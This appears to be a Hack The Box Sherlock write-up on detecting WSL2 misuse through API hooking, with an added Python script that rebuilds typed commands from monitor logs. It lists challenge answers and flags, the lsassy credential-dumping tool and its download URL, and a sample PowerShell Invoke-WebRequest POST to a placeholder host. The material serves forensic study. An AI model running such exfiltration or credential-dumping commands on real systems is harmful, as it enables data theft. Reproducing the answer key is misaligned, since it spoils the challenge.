Jugglin

HTB Sherlock Writeup

Sherlock Category: DFIR

Sherlock Difficulty: Medium

Scenario: Forela Corporation heavily depends on the utilisation of the Windows Subsystem for Linux (WSL), and currently, threat actors are leveraging this feature, taking advantage of its elusive nature that makes it difficult for defenders to detect. In response, the red team at Forela has executed a range of commands using WSL2 and shared API logs for analysis.

Task 1

Question: What was the initial command executed by the insider?

We are given two different .apmx64 files, Attacker.apmx and Insider.apmx. We can promptly open these files using API Monitor.

whoami

Task 2

Question: Which string function can be intercepted to monitor keystrokes by an insider?

Hack The Box has a blog on WSL activity and API Hooking where we can find the answer: How to track WSL2 activity with API hooking

RtlUnicodeToUTF8N, WideCharToMultiByte

Task 3

Question: Which Linux distribution was the insider interacting with?

kali

Task 4

Question: Which file did the insider access in order to read its contents?

Higher-level functions in KernelBase.dll invoke RtlUnicodeToUTF8N when they need to convert Unicode text to UTF-8, which is exactly what happens to input passed from the Windows console into WSL. By filtering specifically for events whose calling module is KernelBase.dll, we drop the noise from other callers and get a clearer view of what the insider typed, including the file they read.
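
The triage steps used in this and the following tasks (filter by calling module, stitch per-character RtlUnicodeToUTF8N conversions back into command lines, pull Windows tool invocations from RtlUTF8ToUnicodeN, and read the data going through WriteFile) can be scripted once the monitor log is exported. The script below is an added example, not part of this writeup and not API Monitor's own export format: it assumes a tab-separated layout of timestamp, calling module, API, `name=repr(value)` argument pairs and return value, and the argument labels `UnicodeString`, `UTF8String` and `Buffer` are placeholders standing in for the real parameter names. The log it parses is constructed inline, with a placeholder URL instead of any real address.

```python
"""Triage helper for an API-monitor style call log captured from a WSL2 session.

Added example; the record layout below is an assumption, not API Monitor's export.
"""
from __future__ import annotations
import ast
import re
from typing import NamedTuple

API_KEYS = "RtlUnicodeToUTF8N"   # typed input: Windows console -> WSL (Unicode to UTF-8)
API_TOOL = "RtlUTF8ToUnicodeN"   # WSL -> Windows: e.g. a .exe invoked from the Linux shell
API_WRITE = "WriteFile"          # data written back to the console or a file handle


class Record(NamedTuple):
    ts: int        # constructed millisecond timestamp
    module: str    # calling module as the monitor reports it
    api: str
    args: dict     # parsed name=value pairs
    ret: str


def _rec(ts: int, module: str, api: str, ret: str = "STATUS_SUCCESS", **kw) -> str:
    """One constructed log line: ts<TAB>module<TAB>api<TAB>name=repr(value) ...<TAB>ret."""
    args = " ".join(f"{k}={v!r}" for k, v in kw.items())
    return f"{ts}\t{module}\t{api}\t{args}\t{ret}"


def _typed(cmd: str, t0: int) -> list[str]:
    """Constructed per-keystroke records: one conversion call per character typed."""
    return [_rec(t0 + i, "KernelBase.dll", API_KEYS, UnicodeString=ch)
            for i, ch in enumerate(cmd + "\r")]


# Constructed sample log. "\b" models a backspace correcting a typo (assumed encoding).
_PS = "powershell.exe -c Invoke-WebRequest -Uri http://placeholder.invalid/u -Method POST"
SAMPLE_LOG = "\n".join(
    _typed("whoamu\bi", 1000)
    + [_rec(1100, "KernelBase.dll", API_WRITE, "TRUE", Buffer="forela-user\r\n")]
    + [_rec(1200, "other.dll", API_KEYS, UnicodeString="z")]   # noise from another caller
    + _typed("cat flag.txt", 2000)
    + [_rec(2100, "KernelBase.dll", API_WRITE, "TRUE", Buffer="FLAG{constructed-example}\r\n")]
    + _typed(_PS, 3000)
    + [_rec(3200, "KernelBase.dll", API_TOOL, UTF8String=_PS)]
)

_ARG_RE = re.compile(r"(\w+)=('(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\")")
_READ_CMDS = re.compile(r"^(?:cat|less|more|head|tail|strings)\s+(?:-\S+\s+)*(\S+)")


def parse_log(text: str) -> list[Record]:
    """Parse the assumed tab-separated layout into Record objects, ordered by time."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, module, api, args, ret = line.split("\t", 4)
        parsed = {k: ast.literal_eval(v) for k, v in _ARG_RE.findall(args)}
        records.append(Record(int(ts), module, api, parsed, ret))
    return sorted(records, key=lambda r: r.ts)


def by_module(records: list[Record], module: str) -> list[Record]:
    """Keep only calls made from the given module (case-insensitive)."""
    return [r for r in records if r.module.lower() == module.lower()]


def reconstruct_typed_input(records: list[Record]) -> list[str]:
    """Join per-keystroke RtlUnicodeToUTF8N conversions into the command lines typed."""
    lines, cur = [], []
    for r in records:
        if r.api != API_KEYS:
            continue
        ch = r.args.get("UnicodeString", "")
        if ch in ("\r", "\n"):            # Enter ends a command line
            if cur:
                lines.append("".join(cur))
            cur = []
        elif ch in ("\b", "\x7f"):        # backspace/DEL: drop the last character
            if cur:
                cur.pop()
        else:
            cur.append(ch)
    if cur:
        lines.append("".join(cur))
    return lines


def windows_tool_invocations(records: list[Record]) -> list[str]:
    """Strings crossing from WSL back into Windows via RtlUTF8ToUnicodeN."""
    return [r.args["UTF8String"] for r in records
            if r.api == API_TOOL and "UTF8String" in r.args]


def files_read(commands: list[str]) -> list[str]:
    """File names given to common read commands in the reconstructed input."""
    return [m.group(1) for cmd in commands if (m := _READ_CMDS.match(cmd))]


def written_buffers(records: list[Record]) -> list[str]:
    """Payloads passed to WriteFile, e.g. command output echoed to the console."""
    return [r.args["Buffer"] for r in records
            if r.api == API_WRITE and "Buffer" in r.args]


def powershell_cmdlets(commands: list[str]) -> list[str]:
    """Verb-Noun cmdlet names appearing in the typed commands."""
    return sorted({m for c in commands for m in re.findall(r"\b[A-Z][a-z]+-[A-Z]\w+", c)})


if __name__ == "__main__":
    kb = by_module(parse_log(SAMPLE_LOG), "KernelBase.dll")
    cmds = reconstruct_typed_input(kb)
    print("typed:", cmds)
    print("files read:", files_read(cmds))
    print("windows tools:", windows_tool_invocations(kb))
    print("cmdlets:", powershell_cmdlets(cmds))
    print("written:", written_buffers(kb))
```

Run against a real export you would first adapt `parse_log` to the tool's column layout and the argument labels to the actual parameter names shown in the log; the rest of the logic (module filter, keystroke stitching, direction-based split between RtlUnicodeToUTF8N and RtlUTF8ToUnicodeN, WriteFile payloads) carries over unchanged.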

flag.txt

Task 5

Question: Submit the first flag.

HOOK_tH1$_apI_R7lUNIcoDet0utf8N

Task 6

Question: Which PowerShell module did the insider utilize to extract data from their machine?

Looking again at the KernelBase.dll activity, we can see that the insider used the PowerShell module Invoke-WebRequest to extract data from their machine.

Invoke-WebRequest

Task 7

Question: Which string function can be intercepted to monitor the usage of Windows tools via WSL by an insider?

RtlUTF8ToUnicodeN

Task 8

Question: The insider has also accessed ‘confidential.txt’. Please provide the second flag for submission.

H0ok_ThIS_@PI_rtlutf8TounICOD3N

Task 9

Question: Which command executed by the attacker resulted in a ‘not found’ response?

lsassy

Task 10

Question: Which link was utilized to download the ‘lsassy’ binary?

http://3.6.165.8/lsassy

Task 11

Question: What is the SHA1 hash of victim ‘user’?

e8f97fba9104d1ea5047948e6dfb67facd9f5b73

Task 12

Question: When an attacker utilizes WSL2, which WIN32 API would you intercept to monitor its behavior?

WriteFile